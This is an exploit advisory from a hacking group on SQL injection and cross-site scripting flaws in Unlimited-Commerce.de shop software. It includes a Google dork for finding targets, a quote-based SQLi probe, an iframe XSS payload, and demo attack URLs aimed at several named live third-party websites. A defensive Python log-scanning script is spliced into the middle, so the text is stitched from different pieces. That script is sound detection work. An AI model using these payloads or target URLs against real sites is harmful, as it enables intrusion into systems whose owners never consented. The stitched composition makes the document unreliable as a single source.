* Title: Shopsoftware by Unlimited-Commerce.de Multiple Vulnerabilities
* date: 28/4/2016
* Exploit Author : Guardiran Security Team
* Website: guardiran.org
* Google Dork: intext:"Shopsoftware 2009-2010 by Unlimited-Commerce.de"
* Vendor Homepage: http://www.unlimited-commerce.de/
* Version : All Versions
* Tested On : Kali Linux / Windows 8.1
Hello guys.
This is a multiple-vulnerability advisory (XSS & SQLi).
------------------
SQL INJECTION :
Insert " or ' after the parameter value in the URL to trigger a MySQL error.
Then you can use SQL injection commands to inject into the website and hack it.
Demo :
http://durchfahrt.de/cms_pages.php?pn=Datenschutz%27
http://www.adels-archiv.com/shop/showcatrows.php?CategoryID=2&SubcategoryID=5%27
http://media.starclubmusic.de/showcatrows.php?CategoryID=12&SubcategoryID=13%27
XSS:
This CMS also has an XSS vulnerability.
We can run our JavaScript code on the site.
Payload: '><iframe src="http://guardiran.org" width="450" height="200"></iframe>
Demo:
http://durchfahrt.de/cms_pages.php?pn=Datenschutz%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
http://www.download-by-zet.de/cms_pages.php?pn=Widerrufsbelehrung%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
http://media.starclubmusic.de/showcatrows.php?CategoryID=12&SubcategoryID=13%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
http://www.adels-archiv.com/shop/showcatrows.php?CategoryID=2&SubcategoryID=5%27%3E%3Ciframe%20src=%22http://guardiran.org%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
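Both findings above (the trailing-quote SQLi probe against `pn=`/`SubcategoryID=` and the `'><iframe ...>` XSS payload) leave the same fingerprint in a web server's access log. The following is an added example for operators of an affected shop, not code from the advisory or from Unlimited-Commerce.de: it parses combined-format log lines, decodes each query parameter, and flags values that end in a stray quote or that decode to HTML tag markup. The log lines, IP addresses and the `example.invalid` host are constructed for the example; the script paths match the ones named in the advisory.

```python
"""Detection helper for the two probe patterns described in the advisory.

Added example (not part of the original advisory). It reads Apache/nginx
combined-format access-log lines, decodes the query string of each request
and flags
  1. parameter values ending in a stray quote (the error-based SQLi probe), and
  2. parameter values that decode to HTML tag markup such as <iframe (the XSS payload).
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (IPs and the iframe host are placeholders, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [28/Apr/2016:10:01:02 +0000] "GET /cms_pages.php?pn=Datenschutz HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Apr/2016:10:01:09 +0000] "GET /cms_pages.php?pn=Datenschutz%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Apr/2016:10:01:15 +0000] "GET /showcatrows.php?CategoryID=12&SubcategoryID=13%27%3E%3Ciframe%20src=%22http://example.invalid%22%3E%3C/iframe%3E HTTP/1.1" 200 905 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Apr/2016:10:02:00 +0000] "GET /showcatrows.php?CategoryID=2&SubcategoryID=5 HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
"""

# Request line inside the quoted part of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Opening or closing HTML tag start, e.g. "<iframe", "</script".
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.IGNORECASE)


def parse_request(line):
    """Return (method, path, [(name, value), ...]) for one log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # keep_blank_values so a bare "?pn=" still shows up as a parameter
    params = parse_qsl(parts.query, keep_blank_values=True)
    return m.group("method"), parts.path, params


def classify_value(value):
    """Label a parameter value as 'xss', 'sqli-probe' or None."""
    # parse_qsl has already decoded once; decode again to catch double-encoding.
    decoded = unquote(value)
    if TAG_RE.search(decoded):
        return "xss"
    # A value whose last character is a quote is the error-triggering probe
    # the advisory describes.
    if decoded.endswith(("'", '"')):
        return "sqli-probe"
    return None


def scan_log(text):
    """Return findings as (path, parameter name, label) for suspicious requests."""
    findings = []
    for line in text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        _, path, params = parsed
        for name, value in params:
            label = classify_value(value)
            if label:
                findings.append((path, name, label))
    return findings


if __name__ == "__main__":
    for path, name, label in scan_log(SAMPLE_LOG):
        print(f"{label:10s} {path} param={name}")
```

Run it against a real log with `scan_log(open("access.log").read())`. The quote check is deliberately narrow (a trailing quote only) so that German page names or search terms containing apostrophes mid-word do not fire; the tag check is broad, since a legitimate `pn=` or `SubcategoryID=` value on this software should never decode to markup. Either hit on these two scripts is a good reason to deploy the usual fixes on the server side: parameterized queries for the `pn`, `CategoryID` and `SubcategoryID` lookups and HTML-escaping of those values before they are echoed into the page.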
* Special Thanks : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker
* Discovered By : MR.IMAN ~~ demon.hacker37@yahoo.com ~~ telegram.me/MRBLACK
* We Are Guardiran Security Team